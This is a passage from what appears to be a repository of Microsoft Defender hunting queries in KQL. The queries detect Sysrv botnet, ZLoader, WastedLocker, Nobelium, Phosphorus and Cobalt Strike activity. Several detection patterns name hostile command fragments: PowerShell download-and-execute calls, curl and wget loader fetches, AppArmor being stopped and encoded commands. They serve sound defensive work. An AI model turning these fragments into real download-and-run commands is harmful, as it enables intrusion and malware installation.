has "/bin/bash /tmp/" and ProcessCommandLine has "service apparmor stop" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? 
(v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | v | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md ================================================ # Java process executing command line to download and execute PowerShell script This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of the Java process being used to execute cmd.exe, and download and execute a PowerShell script. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessFileName == 'java.exe' and FileName == 'cmd.exe' and ProcessCommandLine has_all('powershell iex','DownloadString') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? 
(v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/kinsing-miner-download.md ================================================ # Kinsing miner download This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances where the attacker commanded the Kinsing miner file to be downloaded on Linux devices. ## Query ```kusto DeviceProcessEvents | where ProcessCommandLine has_all('curl', '-o /etc/kinsing') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? 
(v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | v | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md ================================================ # Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of Oracle WebLogic being exploited to run a PowerShell script that downloads payloads. ## Query ```kusto union DeviceProcessEvents, DeviceFileEvents | where InitiatingProcessParentFileName =~ 'wlsvcX64.exe' and InitiatingProcessFileName =~ 'powershell.exe' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? 
(v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md
================================================
# Remote code execution on vulnerable server

This query was originally published in the threat analytics report, *Sysrv botnet evolution*.

Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.

The following query finds instances of remote code execution on a vulnerable server running PHP as CGI: a php-cgi.exe process runs a command that fetches the ldr.sh loader with curl or wget. Note that the filter keys on the php-cgi.exe image name, so it matches the Windows build of PHP CGI.

## Query

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "php-cgi.exe"
| where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md
================================================
# Tomcat 8 process executing an encoded PowerShell command line to perform post-exploitation activities and set up scheduled tasks
This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessParentFileName startswith 'tomcat' | where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc ' and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Threat actor Phosphorus masquerading as conference organizers.md ================================================ # Threat actor Phosphorus masquerading as conference organizers Identify prior activity from this campaign using IOCs shared by Microsoft’s Threat Intelligence Center, or MSTIC. 
Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

## Query

Three standalone queries follow; run them one at a time.

```
// All emails from the threat actor Phosphorus, masquerading as conference organizers, based on the IOCs shared
// by Microsoft’s Threat Intelligence Center in: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com", "munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders)
```

```
// Filter for emails that were delivered; check FinalEmailAction to see whether a policy was applied to the email
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com", "munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
```

```
// Filter for emails that were delivered and check whether any action was taken on them post delivery, by joining with EmailPostDeliveryEvents
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com", "munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
| join EmailPostDeliveryEvents on NetworkMessageId, RecipientEmailAddress
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered?
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | V | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Tali Ash **GitHub alias:** tali-ash **Organization:** Microsoft **Contact info:** @Taliash1 ================================================ FILE: Campaigns/WastedLocker Downloader.md ================================================ # WastedLocker Downloader This query identifies the launch pattern associated with wastedlocker ransomware. Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us ## Query ``` DeviceProcessEvents | where InitiatingProcessFileName =~ 'wscript.exe' and FileName =~ 'powershell.exe' and InitiatingProcessCommandLine matches regex @"(?i)\\chrome\.update\..+?\.js" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? 
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution |v| | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Campaigns/ZLoader/Malicious bat file.md ================================================ # Malicious .bat file in suspicious Oracle Java SE folder path ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted by @MsftSecIntel on twitter. ## Query This query looks for the suspicious .bat file placed in the folder using a specific naming convention purporting to be Java-related. ``` DeviceFileEvents | where FileName endswith '.bat' and FolderPath has @'Program Files (x86)\Sun Technology Network\Oracle Java SE' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? 
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/ZLoader/Payload Delivery.md ================================================ # Tim.exe payload delivery ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on twitter. ## Query This query looks for delivery of the malicious payload, Tim.exe. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ 'powershell.exe' and InitiatingProcessCommandLine has('Invoke-WebRequest') and InitiatingProcessCommandLine endswith '-OutFile tim.EXE' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? 
(v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/ZLoader/Suspicious Registry Keys.md
================================================
# Suspicious Registry Keys

ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter. In this campaign, the malicious .msi files create registry keys whose values carry the attacker-created company names.

## Query

This query looks for the suspicious registry values that name the attacker-created companies.

```
DeviceRegistryEvents
| where RegistryValueData in('Flyintellect Inc.', 'Datalyst ou')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered?
(v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/apt sofacy zebrocy.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine endswith "cmd.exe /c SYSTEMINFO & TASKLIST" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt sofacy.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dat",' or ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dll",#1' | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt ta17 293a ps.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine =~ "ps.exe -accepteula" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt tropictrooper.txt ================================================ // Original Sigma Rule: 
https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt unidentified nov 18.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine endswith "cyzfc.dat, PointFunctionCall" | top 100 by Timestamp desc DeviceFileEvents | where Timestamp > ago(7d) | where FolderPath has "ds7002.lnk" | top 100 by Timestamp desc ================================================ FILE: Campaigns/c2-lookup-from-nonbrowser[Nobelium].md ================================================ # Locate Nobelium implant receiving DNS response This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. 
The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.

## Query

```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
    and AdditionalFields has ".avsvmcloud"

IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName, IPAddress, ReportId
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/c2-lookup-response[Nobelium].md
================================================
# Locate Nobelium implant receiving DNS response

This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query

```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
    and AdditionalFields has ".avsvmcloud"

IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName, IPAddress, ReportId
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/cobalt-strike-invoked-w-wmi.md
================================================
# Detect Cobalt Strike invoked via WMI

This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/).

[Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot.

During the earliest stages of a Ryuk infection, an operator downloads [Cobalt Strike](https://www.cobaltstrike.com/), a penetration testing kit that is also used by malicious actors. Cobalt Strike is used by Ryuk operators to explore the network before deploying the Ryuk payload. This malicious behavior is often obscured by Base64 encoding and other tricks.

The following query detects possible invocation of Cobalt Strike using [Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/wmi-start-page) (WMI).

The [See also](#See-also) section below lists links to other queries associated with Ryuk ransomware.
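To see how the filters in the query that follows behave on concrete records, here is an added Python port of them (example code, not part of the repository), run over constructed DeviceProcessEvents-style events; it also decodes the `-EncodedCommand` payload, which is what an analyst does next when triaging a hit. The regex for `hasprefix '-e'` and the substring test for `!has` are approximations of KQL term matching.

```python
import base64
import re
from typing import List, Optional

# Added example (not code from the repository): a Python port of the query's
# where-clauses, applied to constructed records so the match, the SCCM exclusion
# and the out-of-scope cases can be compared side by side.

# Same pattern as the query's `matches regex`: a run of 50+ Base64 characters.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{50,}={0,2}")
# KQL `hasprefix '-e'` is a case-insensitive term-prefix match (-e, -enc,
# -EncodedCommand, but also -ExecutionPolicy); this regex approximates it.
ENC_SWITCH = re.compile(r"(?:^|\s)-e\w*", re.IGNORECASE)


def is_wmi_encoded_powershell(event: dict) -> bool:
    """Apply the query's filters to one process-creation record."""
    parent = event.get("InitiatingProcessFileName", "").lower()
    child = event.get("FileName", "").lower()
    cmd = event.get("ProcessCommandLine", "")
    if parent != "wmiprvse.exe":          # only WMI-initiated instances
        return False
    if child != "powershell.exe":
        return False
    if not (ENC_SWITCH.search(cmd) or "frombase64" in cmd.lower()):
        return False
    if not BASE64_RUN.search(cmd):        # the Base64 regex check
        return False
    # Exclusion: SCCM client activity under Windows\CCM\ is a known false positive.
    return "windows\\ccm\\" not in cmd.lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (Base64 of UTF-16LE) for triage."""
    match = BASE64_RUN.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(0), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not well-formed Base64 / UTF-16LE
        return None


def hunt(events: List[dict]) -> List[str]:
    """Return the DeviceIds of the records the query would surface."""
    return [e["DeviceId"] for e in events if is_wmi_encoded_powershell(e)]


# Constructed sample data: a harmless script, encoded the way PowerShell expects.
SAMPLE_SCRIPT = "Write-Host 'constructed sample'"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # WMI-spawned, encoded command: the case the query is after
        "DeviceId": "dev-01", "InitiatingProcessFileName": "WmiPrvSE.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
    },
    {   # Same shape, but SCCM client activity: dropped by the exclusion
        "DeviceId": "dev-02", "InitiatingProcessFileName": "WmiPrvSE.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": (f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
                               f"{ENCODED} C:\\Windows\\CCM\\SystemTemp\\task.ps1"),
    },
    {   # Encoded, but not WMI-initiated: outside the query's scope
        "DeviceId": "dev-03", "InitiatingProcessFileName": "explorer.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": f"powershell.exe -enc {ENCODED}",
    },
    {   # WMI-spawned but a plain command line: no Base64 run to match
        "DeviceId": "dev-04", "InitiatingProcessFileName": "WmiPrvSE.exe",
        "FileName": "powershell.exe",
        "ProcessCommandLine": "powershell.exe -Command Get-Process",
    },
]

if __name__ == "__main__":
    for device_id in hunt(SAMPLE_EVENTS):
        hit = next(e for e in SAMPLE_EVENTS if e["DeviceId"] == device_id)
        print(device_id, "->", decode_encoded_command(hit["ProcessCommandLine"]))
```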
## Query

```Kusto
// Find use of Base64 encoded PowerShell
// Indicating possible Cobalt Strike
DeviceProcessEvents
| where Timestamp > ago(7d)
// Only WMI-initiated instances, remove to broaden scope
| where InitiatingProcessFileName =~ 'wmiprvse.exe'
| where FileName =~ 'powershell.exe'
    and (ProcessCommandLine hasprefix '-e' or ProcessCommandLine contains 'frombase64')
// Check for Base64 with regex
| where ProcessCommandLine matches regex '[A-Za-z0-9+/]{50,}[=]{0,2}'
// Exclusions: The above regex may trigger false positive on legitimate SCCM activities.
// Remove this exclusion to search more broadly.
| where ProcessCommandLine !has 'Windows\\CCM\\'
| project DeviceId, Timestamp, InitiatingProcessId, InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md)
* [Detect credential theft via SAM database export by LaZagne](../Credential%20Access/lazagne.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
